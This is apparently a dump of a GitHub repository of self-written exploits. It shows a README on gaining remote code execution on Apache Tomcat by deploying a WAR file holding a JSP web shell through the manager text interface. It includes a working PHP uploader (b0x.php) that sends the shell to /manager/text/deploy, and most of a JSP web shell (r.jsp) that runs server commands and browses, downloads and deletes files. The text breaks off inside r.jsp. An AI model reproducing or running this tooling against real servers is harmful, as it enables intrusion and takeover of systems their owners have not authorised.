├── Apache-Tomcat-Text_interface-shell-upload ├── README.md ├── b0x.php ├── b0x.war ├── r.jsp ├── s.jsp ├── screenshot.png └── sh3lls.war ├── DALIM-Software-web-applications_server ├── README.md ├── dal_exploit.png └── id_rsa ├── Joomla-SQL-Injection-3.7 ├── 3xpl0173r.php ├── README.md └── SQL Injection joomla.png ├── MSSQL Error-Based SQL Injection Order by clause ├── Error based SQL Injection in “Order By” clause (MSSQL).pdf └── README.md ├── POSNIC ├── SQL-Injection.php ├── posnic.png ├── posnic_exploit_code.php └── readme.md ├── README.md ├── RFI-PHP-SMB_server └── README.md ├── TestLink (version <= 1.9.19) Server Side Request Forgery ├── POCs │ ├── 1 (Request to local machine open port).png │ ├── 2 (Request to local machine closed port).png │ ├── 3 (Internal IP server and request to open port).png │ ├── 4 (Internal IP with open port).png │ ├── 5 (Internal IP with closed Port).png │ ├── 6 (Non-existing Internal IP).png │ ├── README.md │ ├── script1.png │ └── script2.png ├── README.md └── testlink_ssrf.php ├── TestLink -below 1.9.17- Remote Code Execution ├── README.md └── testlink POC.png ├── WordPress Polls plugin-1.2.4- SQL Injection vulnerability ├── README.md └── injected.png └── vBulletin-forum-runner-SQL-Injection └── README.md /Apache-Tomcat-Text_interface-shell-upload/README.md: -------------------------------------------------------------------------------- 1 | This PHP script can deploy war file on target server using apache tomcat text interface if manager GUI is not enabled. 2 | 3 | ![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/Apache-Tomcat-Text_interface-shell-upload/screenshot.png) 4 | 5 | In common scenario, attacker can achieve remote code execution on a server having Apache Tomcat enabled on it by accessing Apache tomcat Manager GUI panel. Attacker can brute force, guess the apache tomcat panel credentials or even can try default user accounts to compromise it. Once attacker get access to manager GUI panel, by deploying WAR file (having JSP web shell in it), Remote Code Execution on Server can be achieved. 6 | 7 | Apache tomcat server is having functionality to deploy WAR files (having java code files in it.) and to perform it, we have Manager GUI panel (accessible to authenticated users only). 8 | 9 | Every time this is not the case, tomcat admin user may not have rights to access Manager GUI panel which limits the remote code execution possibility. Attacker need to have access on GUI panel to deploy WAR file. 10 | 11 | After exploring the Apache tomcat documentation, it came to my knowledge that Apache Tomcat after version 7 has "Text interface" as well which allows deployment of war files on server. Text interface is purely based on commands and does not have any GUI interface. 12 | 13 | When I was searching around for remote WAR file deployment using "Text Interface", I found a link to a gist on github.com in which developer mentioned CURL command to upload WAR file on server using "Text Interface". "Text Interface" support remote WAR file uploading using PUT method request (Only authenticated user), so if attacker has access to "Text Interface", by crafting "CURL" PUT method request WAR file can be deploy on tomcat server. 14 | 15 | I exploited server in 2 ways: 16 | 17 | 1) By using manual CURL command on Linux system. 18 | 19 | 2) By developing PHP script which make a same CURL request and just needed Apache Tomcat installation URL, username, password of tomcat panel, War file which we want to upload on target server and name of deployment with which WAR file will get deploy on the server. 20 | -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/b0x.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | --==[[Mannu Sh3LL]]==-- 13 | 14 | 15 | 16 | 17 | 181 | 182 | 203 | 204 | '; 205 | 206 | 207 | 208 | 209 | echo $head ; 210 | 211 | echo ' 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 |
221 | 222 | --==[[ Apache Tomcat shell uploader]]==--
223 | --==[[ With Love From IndiShell Crew]]==-- 224 |
225 | 226 | 227 |
232 | 233 | 234 | 235 | ####################################################################################################################################
236 | 237 | -==[[Greetz to]]==--
zero cool ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell, cyber warrior, Hacker Fantastic and rest of TEAM INDISHELL
238 | 239 | --==[[Love to]]==--
# My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji,Rafay Baloch,Soldier Of God,Shafoon,Rehan Manzoor,almas malik, Bhuppi,Mohit, Ffe ^_^,Govind Singh,Shardhanand ,Budhaoo,Don(Deepika kaushik) and D3
240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | #################################################################################################################################### 248 | 249 | 250 | 251 |
252 | 253 |
254 | 255 | 256 | '; 257 | 258 | ?> 259 |
260 | 261 | 272 |
262 | 263 |
264 | Apache Tomcat Target URL: 265 |

266 | Tomcat interface Username: 267 | Tomcat interface Password:

268 | WAR file having JSP shell in it: - WAR file deploy name: - 269 | 270 | 271 |
273 | 274 |
275 | 276 | 277 | '; 302 | 303 | } 304 | 305 | 306 | $url=trim($_POST['url']).'/manager/text/deploy?path=/'.trim($_POST['deploy']); 307 | 308 | $localFile = $_FILES['file']['tmp_name']; 309 | $fdata = fopen($localFile, 'r'); 310 | 311 | $curl = curl_init(); 312 | 313 | $cfile = new CURLFILE($_FILES['file']['tmp_name'], $_FILES['file']['type'], $_FILES['file']['name']); 314 | curl_setopt_array($curl, 315 | array( 316 | CURLOPT_PUT => 1, 317 | CURLOPT_UPLOAD => 1, 318 | CURLOPT_INFILE => $fdata, 319 | CURLOPT_USERPWD => $username.':'.$password, 320 | CURLOPT_HTTPAUTH => CURLAUTH_BASIC, 321 | CURLOPT_NOPROGRESS => false, 322 | CURLOPT_BUFFERSIZE => 128, 323 | CURLOPT_INFILESIZE => filesize($localFile), 324 | CURLOPT_URL => $url, 325 | CURLOPT_RETURNTRANSFER => true, 326 | CURLOPT_ENCODING => "", 327 | CURLOPT_MAXREDIRS => 10, 328 | CURLOPT_TIMEOUT => 30, 329 | CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, 330 | CURLOPT_HTTPHEADER => array("content-type: multipart/form-data"), 331 | ) 332 | ); 333 | $response = curl_exec($curl); 334 | $err = curl_error($curl); 335 | 336 | curl_close($curl); 337 | 338 | if ($err){ 339 | echo "Error #:" . $err; 340 | } 341 | else { 342 | echo $response; 343 | echo '
Enjoy your shell at
'.trim($_POST['url']).'/'.trim($_POST['deploy']).'/r.jsp'; 344 | } 345 | 346 | } 347 | 348 | echo "Developed By 1046 at IndiShell Lab"; 349 | 350 | ?> -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/b0x.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Apache-Tomcat-Text_interface-shell-upload/b0x.war -------------------------------------------------------------------------------- /Apache-Tomcat-Text_interface-shell-upload/r.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.util.*, 2 | java.net.*, 3 | java.text.*, 4 | java.util.zip.*, 5 | java.io.*" 6 | %> 7 | 8 | 9 |
10 | 11 | --==[[ Moded By 1046]]==--
12 | 13 | 14 |
19 | 20 | 21 | 22 | ####################################################################################################################################
23 | 24 | 25 |
26 | 27 |
28 |
29 | <%! 30 | private static final boolean NATIVE_COMMANDS = true; 31 | private static final boolean RESTRICT_BROWSING = false; 32 | private static final boolean RESTRICT_WHITELIST = false; 33 | private static final String RESTRICT_PATH = "/etc;/var"; 34 | private static final int UPLOAD_MONITOR_REFRESH = 2; private static final int EDITFIELD_COLS = 85; private static final int EDITFIELD_ROWS = 30; private static final boolean USE_POPUP = true; 35 | private static final boolean USE_DIR_PREVIEW = true; 36 | private static final int DIR_PREVIEW_NUMBER = 10; 37 | private static final String CSS_NAME = "Browser.css"; 38 | private static final int COMPRESSION_LEVEL = 1; 39 | private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; 40 | private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows 41 | private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds 42 | private static final String SAVE_AS_ZIP = "Download selected files as zip"; 43 | private static final String RENAME_FILE = "Rename File"; 44 | private static final String DELETE_FILES = "Delete selected files"; 45 | private static final String CREATE_DIR = "Create Dir"; 46 | private static final String CREATE_FILE = "Create File"; 47 | private static final String MOVE_FILES = "Move Files"; 48 | private static final String COPY_FILES = "Copy Files"; 49 | private static String tempdir = "."; 50 | private static String VERSION_NR = "1.1a"; 51 | private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); 52 | 53 | public class UplInfo { 54 | 55 | public long totalSize; 56 | public long currSize; 57 | public long starttime; 58 | public boolean aborted; 59 | 60 | public UplInfo() { 61 | totalSize = 0l; 62 | currSize = 0l; 63 | starttime = System.currentTimeMillis(); 64 | aborted = false; 65 | } 66 | 67 | public UplInfo(int size) { 68 | totalSize = size; 69 | currSize = 0; 70 | starttime = System.currentTimeMillis(); 71 | aborted = false; 72 | } 73 | 74 | public String getUprate() { 75 | long time = System.currentTimeMillis() - starttime; 76 | if (time != 0) { 77 | long uprate = currSize * 1000 / time; 78 | return convertFileSize(uprate) + "/s"; 79 | } 80 | else return "n/a"; 81 | } 82 | 83 | public int getPercent() { 84 | if (totalSize == 0) return 0; 85 | else return (int) (currSize * 100 / totalSize); 86 | } 87 | 88 | public String getTimeElapsed() { 89 | long time = (System.currentTimeMillis() - starttime) / 1000l; 90 | if (time - 60l >= 0){ 91 | if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; 92 | else return time / 60 + ":0" + (time % 60) + "m"; 93 | } 94 | else return time<10 ? "0" + time + "s": time + "s"; 95 | } 96 | 97 | public String getTimeEstimated() { 98 | if (currSize == 0) return "n/a"; 99 | long time = System.currentTimeMillis() - starttime; 100 | time = totalSize * time / currSize; 101 | time /= 1000l; 102 | if (time - 60l >= 0){ 103 | if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; 104 | else return time / 60 + ":0" + (time % 60) + "m"; 105 | } 106 | else return time<10 ? "0" + time + "s": time + "s"; 107 | } 108 | 109 | } 110 | 111 | public class FileInfo { 112 | 113 | public String name = null, clientFileName = null, fileContentType = null; 114 | private byte[] fileContents = null; 115 | public File file = null; 116 | public StringBuffer sb = new StringBuffer(100); 117 | 118 | public void setFileContents(byte[] aByteArray) { 119 | fileContents = new byte[aByteArray.length]; 120 | System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); 121 | } 122 | } 123 | 124 | public static class UploadMonitor { 125 | 126 | static Hashtable uploadTable = new Hashtable(); 127 | 128 | static void set(String fName, UplInfo info) { 129 | uploadTable.put(fName, info); 130 | } 131 | 132 | static void remove(String fName) { 133 | uploadTable.remove(fName); 134 | } 135 | 136 | static UplInfo getInfo(String fName) { 137 | UplInfo info = (UplInfo) uploadTable.get(fName); 138 | return info; 139 | } 140 | } 141 | 142 | // A Class with methods used to process a ServletInputStream 143 | public class HttpMultiPartParser { 144 | 145 | private final String lineSeparator = System.getProperty("line.separator", "\n"); 146 | private final int ONE_MB = 1024 * 1; 147 | 148 | public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, 149 | int clength) throws IllegalArgumentException, IOException { 150 | if (is == null) throw new IllegalArgumentException("InputStream"); 151 | if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( 152 | "\"" + boundary + "\" is an illegal boundary indicator"); 153 | boundary = "--" + boundary; 154 | StringTokenizer stLine = null, stFields = null; 155 | FileInfo fileInfo = null; 156 | Hashtable dataTable = new Hashtable(5); 157 | String line = null, field = null, paramName = null; 158 | boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); 159 | boolean isFile = false; 160 | if (saveFiles) { // Create the required directory (including parent dirs) 161 | File f = new File(saveInDir); 162 | f.mkdirs(); 163 | } 164 | line = getLine(is); 165 | if (line == null || !line.startsWith(boundary)) throw new IOException( 166 | "Boundary not found; boundary = " + boundary + ", line = " + line); 167 | while (line != null) { 168 | if (line == null || !line.startsWith(boundary)) return dataTable; 169 | line = getLine(is); 170 | if (line == null) return dataTable; 171 | stLine = new StringTokenizer(line, ";\r\n"); 172 | if (stLine.countTokens() < 2) throw new IllegalArgumentException( 173 | "Bad data in second line"); 174 | line = stLine.nextToken().toLowerCase(); 175 | if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( 176 | "Bad data in second line"); 177 | stFields = new StringTokenizer(stLine.nextToken(), "=\""); 178 | if (stFields.countTokens() < 2) throw new IllegalArgumentException( 179 | "Bad data in second line"); 180 | fileInfo = new FileInfo(); 181 | stFields.nextToken(); 182 | paramName = stFields.nextToken(); 183 | isFile = false; 184 | if (stLine.hasMoreTokens()) { 185 | field = stLine.nextToken(); 186 | stFields = new StringTokenizer(field, "=\""); 187 | if (stFields.countTokens() > 1) { 188 | if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { 189 | fileInfo.name = paramName; 190 | String value = stFields.nextToken(); 191 | if (value != null && value.trim().length() > 0) { 192 | fileInfo.clientFileName = value; 193 | isFile = true; 194 | } 195 | else { 196 | line = getLine(is); // Skip "Content-Type:" line 197 | line = getLine(is); // Skip blank line 198 | line = getLine(is); // Skip blank line 199 | line = getLine(is); // Position to boundary line 200 | continue; 201 | } 202 | } 203 | } 204 | else if (field.toLowerCase().indexOf("filename") >= 0) { 205 | line = getLine(is); // Skip "Content-Type:" line 206 | line = getLine(is); // Skip blank line 207 | line = getLine(is); // Skip blank line 208 | line = getLine(is); // Position to boundary line 209 | continue; 210 | } 211 | } 212 | boolean skipBlankLine = true; 213 | if (isFile) { 214 | line = getLine(is); 215 | if (line == null) return dataTable; 216 | if (line.trim().length() < 1) skipBlankLine = false; 217 | else { 218 | stLine = new StringTokenizer(line, ": "); 219 | if (stLine.countTokens() < 2) throw new IllegalArgumentException( 220 | "Bad data in third line"); 221 | stLine.nextToken(); // Content-Type 222 | fileInfo.fileContentType = stLine.nextToken(); 223 | } 224 | } 225 | if (skipBlankLine) { 226 | line = getLine(is); 227 | if (line == null) return dataTable; 228 | } 229 | if (!isFile) { 230 | line = getLine(is); 231 | if (line == null) return dataTable; 232 | dataTable.put(paramName, line); 233 | // If parameter is dir, change saveInDir to dir 234 | if (paramName.equals("dir")) saveInDir = line; 235 | line = getLine(is); 236 | continue; 237 | } 238 | try { 239 | UplInfo uplInfo = new UplInfo(clength); 240 | UploadMonitor.set(fileInfo.clientFileName, uplInfo); 241 | OutputStream os = null; 242 | String path = null; 243 | if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, 244 | fileInfo.clientFileName)); 245 | else os = new ByteArrayOutputStream(ONE_MB); 246 | boolean readingContent = true; 247 | byte previousLine[] = new byte[2 * ONE_MB]; 248 | byte temp[] = null; 249 | byte currentLine[] = new byte[2 * ONE_MB]; 250 | int read, read3; 251 | if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { 252 | line = null; 253 | break; 254 | } 255 | while (readingContent) { 256 | if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { 257 | line = null; 258 | uplInfo.aborted = true; 259 | break; 260 | } 261 | if (compareBoundary(boundary, currentLine)) { 262 | os.write(previousLine, 0, read - 2); 263 | line = new String(currentLine, 0, read3); 264 | break; 265 | } 266 | else { 267 | os.write(previousLine, 0, read); 268 | uplInfo.currSize += read; 269 | temp = currentLine; 270 | currentLine = previousLine; 271 | previousLine = temp; 272 | read = read3; 273 | }//end else 274 | }//end while 275 | os.flush(); 276 | os.close(); 277 | if (!saveFiles) { 278 | ByteArrayOutputStream baos = (ByteArrayOutputStream) os; 279 | fileInfo.setFileContents(baos.toByteArray()); 280 | } 281 | else fileInfo.file = new File(path); 282 | dataTable.put(paramName, fileInfo); 283 | uplInfo.currSize = uplInfo.totalSize; 284 | }//end try 285 | catch (IOException e) { 286 | throw e; 287 | } 288 | } 289 | return dataTable; 290 | } 291 | private boolean compareBoundary(String boundary, byte ba[]) { 292 | byte b; 293 | if (boundary == null || ba == null) return false; 294 | for (int i = 0; i < boundary.length(); i++) 295 | if ((byte) boundary.charAt(i) != ba[i]) return false; 296 | return true; 297 | } 298 | private synchronized String getLine(ServletInputStream sis) throws IOException { 299 | byte b[] = new byte[1024]; 300 | int read = sis.readLine(b, 0, b.length), index; 301 | String line = null; 302 | if (read != -1) { 303 | line = new String(b, 0, read); 304 | if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); 305 | } 306 | return line; 307 | } 308 | 309 | public String getFileName(String dir, String fileName) throws IllegalArgumentException { 310 | String path = null; 311 | if (dir == null || fileName == null) throw new IllegalArgumentException( 312 | "dir or fileName is null"); 313 | int index = fileName.lastIndexOf('/'); 314 | String name = null; 315 | if (index >= 0) name = fileName.substring(index + 1); 316 | else name = fileName; 317 | index = name.lastIndexOf('\\'); 318 | if (index >= 0) fileName = name.substring(index + 1); 319 | path = dir + File.separator + fileName; 320 | if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); 321 | else return path.replace('/', File.separatorChar); 322 | } 323 | } //End of class HttpMultiPartParser 324 | class FileComp implements Comparator { 325 | 326 | int mode; 327 | int sign; 328 | 329 | FileComp() { 330 | this.mode = 1; 331 | this.sign = 1; 332 | } 333 | 334 | /** 335 | * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type 336 | * The default sorting method is by Name 337 | * Negative mode means descending sort 338 | */ 339 | FileComp(int mode) { 340 | if (mode < 0) { 341 | this.mode = -mode; 342 | sign = -1; 343 | } 344 | else { 345 | this.mode = mode; 346 | this.sign = 1; 347 | } 348 | } 349 | 350 | public int compare(Object o1, Object o2) { 351 | File f1 = (File) o1; 352 | File f2 = (File) o2; 353 | if (f1.isDirectory()) { 354 | if (f2.isDirectory()) { 355 | switch (mode) { 356 | //Filename or Type 357 | case 1: 358 | case 4: 359 | return sign 360 | * f1.getAbsolutePath().toUpperCase().compareTo( 361 | f2.getAbsolutePath().toUpperCase()); 362 | //Filesize 363 | case 2: 364 | return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); 365 | //Date 366 | case 3: 367 | return sign 368 | * (new Long(f1.lastModified()) 369 | .compareTo(new Long(f2.lastModified()))); 370 | default: 371 | return 1; 372 | } 373 | } 374 | else return -1; 375 | } 376 | else if (f2.isDirectory()) return 1; 377 | else { 378 | switch (mode) { 379 | case 1: 380 | return sign 381 | * f1.getAbsolutePath().toUpperCase().compareTo( 382 | f2.getAbsolutePath().toUpperCase()); 383 | case 2: 384 | return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); 385 | case 3: 386 | return sign 387 | * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); 388 | case 4: { // Sort by extension 389 | int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); 390 | int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); 391 | if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension 392 | return sign 393 | * f1.getAbsolutePath().toUpperCase().compareTo( 394 | f2.getAbsolutePath().toUpperCase()); 395 | } 396 | // f1 has no extension 397 | else if (tempIndexf1 == -1) return -sign; 398 | // f2 has no extension 399 | else if (tempIndexf2 == -1) return sign; 400 | // Both have an extension 401 | else { 402 | String tempEndf1 = f1.getAbsolutePath().toUpperCase() 403 | .substring(tempIndexf1); 404 | String tempEndf2 = f2.getAbsolutePath().toUpperCase() 405 | .substring(tempIndexf2); 406 | return sign * tempEndf1.compareTo(tempEndf2); 407 | } 408 | } 409 | default: 410 | return 1; 411 | } 412 | } 413 | } 414 | } 415 | class Writer2Stream extends OutputStream { 416 | 417 | Writer out; 418 | 419 | Writer2Stream(Writer w) { 420 | super(); 421 | out = w; 422 | } 423 | 424 | public void write(int i) throws IOException { 425 | out.write(i); 426 | } 427 | 428 | public void write(byte[] b) throws IOException { 429 | for (int i = 0; i < b.length; i++) { 430 | int n = b[i]; 431 | //Convert byte to ubyte 432 | n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); 433 | out.write(n); 434 | } 435 | } 436 | 437 | public void write(byte[] b, int off, int len) throws IOException { 438 | for (int i = off; i < off + len; i++) { 439 | int n = b[i]; 440 | n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); 441 | out.write(n); 442 | } 443 | } 444 | } //End of class Writer2Stream 445 | 446 | static Vector expandFileList(String[] files, boolean inclDirs) { 447 | Vector v = new Vector(); 448 | if (files == null) return v; 449 | for (int i = 0; i < files.length; i++) 450 | v.add(new File(URLDecoder.decode(files[i]))); 451 | for (int i = 0; i < v.size(); i++) { 452 | File f = (File) v.get(i); 453 | if (f.isDirectory()) { 454 | File[] fs = f.listFiles(); 455 | for (int n = 0; n < fs.length; n++) 456 | v.add(fs[n]); 457 | if (!inclDirs) { 458 | v.remove(i); 459 | i--; 460 | } 461 | } 462 | } 463 | return v; 464 | } 465 | 466 | /** 467 | * Method to build an absolute path 468 | * @param dir the root dir 469 | * @param name the name of the new directory 470 | * @return if name is an absolute directory, returns name, else returns dir+name 471 | */ 472 | static String getDir(String dir, String name) { 473 | if (!dir.endsWith(File.separator)) dir = dir + File.separator; 474 | File mv = new File(name); 475 | String new_dir = null; 476 | if (!mv.isAbsolute()) { 477 | new_dir = dir + name; 478 | } 479 | else new_dir = name; 480 | return new_dir; 481 | } 482 | 483 | /** 484 | * This Method converts a byte size in a kbytes or Mbytes size, depending on the size 485 | * @param size The size in bytes 486 | * @return String with size and unit 487 | */ 488 | static String convertFileSize(long size) { 489 | int divisor = 1; 490 | String unit = "bytes"; 491 | if (size >= 1024 * 1024) { 492 | divisor = 1024 * 1024; 493 | unit = "MB"; 494 | } 495 | else if (size >= 1024) { 496 | divisor = 1024; 497 | unit = "KB"; 498 | } 499 | if (divisor == 1) return size / divisor + " " + unit; 500 | String aftercomma = "" + 100 * (size % divisor) / divisor; 501 | if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; 502 | return size / divisor + "." + aftercomma + " " + unit; 503 | } 504 | 505 | /** 506 | * Copies all data from in to out 507 | * @param in the input stream 508 | * @param out the output stream 509 | * @param buffer copy buffer 510 | */ 511 | static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { 512 | copyStreamsWithoutClose(in, out, buffer); 513 | in.close(); 514 | out.close(); 515 | } 516 | 517 | /** 518 | * Copies all data from in to out 519 | * @param in the input stream 520 | * @param out the output stream 521 | * @param buffer copy buffer 522 | */ 523 | static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) 524 | throws IOException { 525 | int b; 526 | while ((b = in.read(buffer)) != -1) 527 | out.write(buffer, 0, b); 528 | } 529 | static String getMimeType(String fName) { 530 | fName = fName.toLowerCase(); 531 | if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; 532 | else if (fName.endsWith(".gif")) return "image/gif"; 533 | else if (fName.endsWith(".pdf")) return "application/pdf"; 534 | else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; 535 | else if (fName.endsWith(".avi")) return "video/x-msvideo"; 536 | else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; 537 | else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; 538 | else if (fName.endsWith(".zip")) return "application/zip"; 539 | else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; 540 | else if (fName.endsWith(".rtf")) return "application/rtf"; 541 | else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; 542 | else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") 543 | || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") 544 | || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; 545 | else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; 546 | else if (fName.endsWith(".png")) return "image/png"; 547 | else if (fName.endsWith(".xml")) return "text/xml"; 548 | else if (fName.endsWith(".svg")) return "image/svg+xml"; 549 | else if (fName.endsWith(".mp3")) return "audio/mp3"; 550 | else if (fName.endsWith(".ogg")) return "audio/ogg"; 551 | else return "text/plain"; 552 | } 553 | 554 | /** 555 | * Converts some important chars (int) to the corresponding html string 556 | */ 557 | static String conv2Html(int i) { 558 | if (i == '&') return "&"; 559 | else if (i == '<') return "<"; 560 | else if (i == '>') return ">"; 561 | else if (i == '"') return """; 562 | else return "" + (char) i; 563 | } 564 | 565 | /** 566 | * Converts a normal string to a html conform string 567 | */ 568 | static String conv2Html(String st) { 569 | StringBuffer buf = new StringBuffer(); 570 | for (int i = 0; i < st.length(); i++) { 571 | buf.append(conv2Html(st.charAt(i))); 572 | } 573 | return buf.toString(); 574 | } 575 | 576 | /** 577 | * Starts a native process on the server 578 | * @param command the command to start the process 579 | * @param dir the dir in which the process starts 580 | */ 581 | static String startProcess(String command, String dir) throws IOException { 582 | StringBuffer ret = new StringBuffer(); 583 | String[] comm = new String[3]; 584 | comm[0] = COMMAND_INTERPRETER[0]; 585 | comm[1] = COMMAND_INTERPRETER[1]; 586 | comm[2] = command; 587 | long start = System.currentTimeMillis(); 588 | try { 589 | //Start process 590 | Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); 591 | //Get input and error streams 592 | BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); 593 | BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); 594 | boolean end = false; 595 | while (!end) { 596 | int c = 0; 597 | while ((ls_err.available() > 0) && (++c <= 1000)) { 598 | ret.append(conv2Html(ls_err.read())); 599 | } 600 | c = 0; 601 | while ((ls_in.available() > 0) && (++c <= 1000)) { 602 | ret.append(conv2Html(ls_in.read())); 603 | } 604 | try { 605 | ls_proc.exitValue(); 606 | //if the process has not finished, an exception is thrown 607 | //else 608 | while (ls_err.available() > 0) 609 | ret.append(conv2Html(ls_err.read())); 610 | while (ls_in.available() > 0) 611 | ret.append(conv2Html(ls_in.read())); 612 | end = true; 613 | } 614 | catch (IllegalThreadStateException ex) { 615 | //Process is running 616 | } 617 | //The process is not allowed to run longer than given time. 618 | if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { 619 | ls_proc.destroy(); 620 | end = true; 621 | ret.append("!!!! Process has timed out, destroyed !!!!!"); 622 | } 623 | try { 624 | Thread.sleep(50); 625 | } 626 | catch (InterruptedException ie) {} 627 | } 628 | } 629 | catch (IOException e) { 630 | ret.append("Error: " + e); 631 | } 632 | return ret.toString(); 633 | } 634 | 635 | /** 636 | * Converts a dir string to a linked dir string 637 | * @param dir the directory string (e.g. /usr/local/httpd) 638 | * @param browserLink web-path to Browser.jsp 639 | */ 640 | static String dir2linkdir(String dir, String browserLink, int sortMode) { 641 | File f = new File(dir); 642 | StringBuffer buf = new StringBuffer(); 643 | while (f.getParentFile() != null) { 644 | if (f.canRead()) { 645 | String encPath = URLEncoder.encode(f.getAbsolutePath()); 646 | buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); 648 | } 649 | else buf.insert(0, conv2Html(f.getName()) + File.separator); 650 | f = f.getParentFile(); 651 | } 652 | if (f.canRead()) { 653 | String encPath = URLEncoder.encode(f.getAbsolutePath()); 654 | buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); 656 | } 657 | else buf.insert(0, f.getAbsolutePath()); 658 | return buf.toString(); 659 | } 660 | 661 | /** 662 | * Returns true if the given filename tends towards a packed file 663 | */ 664 | static boolean isPacked(String name, boolean gz) { 665 | return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") 666 | || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() 667 | .endsWith(".war")); 668 | } 669 | 670 | /** 671 | * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not 672 | */ 673 | static boolean isAllowed(File path) throws IOException{ 674 | if (RESTRICT_BROWSING) { 675 | StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); 676 | while (stk.hasMoreTokens()){ 677 | if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) 678 | return RESTRICT_WHITELIST; 679 | } 680 | return !RESTRICT_WHITELIST; 681 | } 682 | else return true; 683 | } 684 | 685 | //--------------------------------------------------------------------------------------------------------------- 686 | 687 | %> 688 | <% 689 | //Get the current browsing directory 690 | request.setAttribute("dir", request.getParameter("dir")); 691 | // The browser_name variable is used to keep track of the URI 692 | // of the jsp file itself. It is used in all link-backs. 693 | final String browser_name = request.getRequestURI(); 694 | final String FOL_IMG = ""; 695 | boolean nohtml = false; 696 | boolean dir_view = true; 697 | // View file 698 | if (request.getParameter("file") != null) { 699 | File f = new File(request.getParameter("file")); 700 | if (!isAllowed(f)) { 701 | request.setAttribute("dir", f.getParent()); 702 | request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); 703 | } 704 | else if (f.exists() && f.canRead()) { 705 | if (isPacked(f.getName(), false)) { 706 | //If zipFile, do nothing here 707 | } 708 | else{ 709 | String mimeType = getMimeType(f.getName()); 710 | response.setContentType(mimeType); 711 | if (mimeType.equals("text/plain")) response.setHeader( 712 | "Content-Disposition", "inline;filename=\"temp.txt\""); 713 | else response.setHeader("Content-Disposition", "inline;filename=\"" 714 | + f.getName() + "\""); 715 | BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); 716 | byte buffer[] = new byte[8 * 1024]; 717 | out.clearBuffer(); 718 | OutputStream out_s = new Writer2Stream(out); 719 | copyStreamsWithoutClose(fileInput, out_s, buffer); 720 | fileInput.close(); 721 | out_s.flush(); 722 | nohtml = true; 723 | dir_view = false; 724 | } 725 | } 726 | else { 727 | request.setAttribute("dir", f.getParent()); 728 | request.setAttribute("error", "File " + f.getAbsolutePath() 729 | + " does not exist or is not readable on the server"); 730 | } 731 | } 732 | // Download selected files as zip file 733 | else if ((request.getParameter("Submit") != null) 734 | && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { 735 | Vector v = expandFileList(request.getParameterValues("selfile"), false); 736 | //Check if all files in vector are allowed 737 | String notAllowedFile = null; 738 | for (int i 